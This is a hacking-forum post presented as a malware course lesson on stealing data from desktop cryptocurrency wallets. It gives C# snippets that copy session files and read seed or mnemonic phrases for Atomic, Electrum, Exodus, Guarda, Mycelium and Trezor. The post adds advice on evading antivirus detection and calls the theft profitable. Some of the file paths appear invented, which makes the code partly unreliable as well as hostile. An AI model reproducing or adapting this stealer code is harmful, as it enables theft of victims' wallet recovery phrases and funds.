Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes | Courses | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!

  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes

Stealing Offline Crypto Wallets with Malware — Top 6 Popular + Source-Codes

highzum
LV
1
 

highzum

Member
Joined
Jan 11, 2024
Threads
13
Likes
14
Awards
4
Credits
1,633©
Cash
0$
Cryptocurrencies are becoming increasingly popular, with a rising number of people storing their digital assets in physical crypto wallets. These wallets, however, are excellent targets for attackers looking to steal bitcoin or other coins. In this lesson, we’ll demonstrate how to add functionality that can be able to steal offline crypto wallets from popular services such as Atomic, Electrum, Exodus, and more 3 popular.

Topic 1: Atomic Wallet​

Atomic Wallet is a well-known offline cryptocurrency wallet that supports over 500 different coins. Using the below source-code you can write a function that is capable of stealing Atomic Wallet passwords and gaining access to users’ crypto assets.
// atomic
// set the folder path to save session files and mnemonic phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "atomic", "Local Storage", "leveldb");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "LOCK*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the mnemonic phrase
string mnemonicPath = Path.Combine(walletPath, "mnemonic.json");
string mnemonicJson = File.ReadAllText(mnemonicPath);
dynamic mnemonic = Newtonsoft.Json.JsonConvert.DeserializeObject(mnemonicJson);
string mnemonicPhrase = mnemonic.mnemonic;

// save the mnemonic phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "mnemonic.txt"), mnemonicPhrase);

Topic 2: Electrum Wallet​

Electrum is another well-known offline crypto wallet that has been in existence since 2011. Using the below source-code you can write a function that can steal Electrum Wallet passwords and access users’ crypto assets.
// electrum
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "electrum.lock");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "wallet_seed");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 3: Exodus Wallet​

Exodus is an easy-to-use offline crypto wallet that supports over 100 cryptocurrencies. Using the below source-code you can write a function that can steal Exodus Wallet credentials and give you access to users’ digital assets.
// exodus
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Exodus");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "exodus.wallet");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.encseed;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Topic 4: Other Crypto Wallets​

There are numerous additional offline crypto wallets with significant credentials than Atomic, Electrum, and Exodus. Using the below source-codes you can write a function that can steal passwords from other popular cryptocurrency wallets, allowing you to access even more digital assets.

A) Guarda​

// guarda
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Guarda");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "mnemonic.key");
string seedJson = File.ReadAllText(seedPath);
dynamic seed = Newtonsoft.Json.JsonConvert.DeserializeObject(seedJson);
string seedPhrase = seed.mnemonic_phrase;

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

B) Mycelium

// mycelium
// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Personal), "Mycelium", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "keys", "masterseed");
byte[] seedBytes = File.ReadAllBytes(seedPath);
string seedPhrase = Encoding.UTF8.GetString(seedBytes);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

C) Trezor​

// set the folder path to save session files and seed phrase
string folderPath = ".";

// get the wallet path
string walletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "trezor", "wallets");

// copy the session files to the folder path
string[] sessionFiles = Directory.GetFiles(walletPath, "session*");
foreach (string file in sessionFiles)
{
File.Copy(file, Path.Combine(folderPath, Path.GetFileName(file)));
}

// get the seed phrase
string seedPath = Path.Combine(walletPath, "seed.txt");
string seedPhrase = File.ReadAllText(seedPath);

// save the seed phrase to a txt file in the folder path
File.WriteAllText(Path.Combine(folderPath, "seed.txt"), seedPhrase);

Finally, I compiled all the topics of lesson 9 & it was detected by 3 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed
Click to expand...

Conclusion​

For attackers looking to steal important digital assets, stealing offline crypto wallets is a profitable technique. This class explained how to create malware that may be used to steal login information from well-known offline cryptocurrency wallets like Atomic, Electrum, and Exodus. With this information, you may create malware programs that are more effective and keep up with the most recent cybersecurity threats. Keep an eye out for our upcoming class when we’ll discuss creating a function that can capture account sessions.
Click to read more...
 
  • Like
Reactions: zuhek22, ishaheen and Mrtalent

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Register

Log in

Already have an account? Log in here.

Similar threads

MulaBhai
    • ☣️MAKING A CRYPTO STEALER IN C#⚡EASY TUTORIAL✅
    21
    473
    bhanush
    bhanush
    amrou77
    • Brute Multi SeedsChecker & CryptoChecker | 18 Networks | NFT, DEBANK 🔥🪙
    17
    554
    niceman4736
    niceman4736
    MulaBhai
    • ☣️MAKING A CRYPTO STEALER IN C#⚡EASY TUTORIAL✅
    27
    635
    zeherila
    zeherila
    zuhek22
    • Method/Tut Working with BTC logs
    25
    599
    moitinhcuoi13
    moitinhcuoi13
    rashtug2
    • Log Crypto Wallet Checker
    • 5.00 star(s) 1 Rating
    75
    2K
    firstbeze
    firstbeze
    AntonGorov
    • Source Code Script Fake | Crypto exchange | 6 designs | Top admin panel with workers
    0
    603
    AntonGorov
    AntonGorov
    zelvafrancek420
    • 2023 Upgraded Mars Crypto Stealer v8.0 + Clipper + Dashboard🤑
    3
    579
    martianxxx
    M
    • Top Bottom
    Tools : Download Tools from our Resources.
    Configs : Download Configs[ob/ob2/svb/cyb/anom].
    Memes : Bored? Lets have some Memes (⁠◠⁠‿⁠◕⁠)
    Crax.Tube : 1st LEARN... Then remove the "L".
    NSFW : I stay away from the internet as much
                                               as I can. Except for PORN.
    Upgrade : Just £15 to access everything NOW!
    Earn : Low on Money?Start Earning from Crax Now!
    Crax.Shop : Buy/Sell without getting Scammed 💯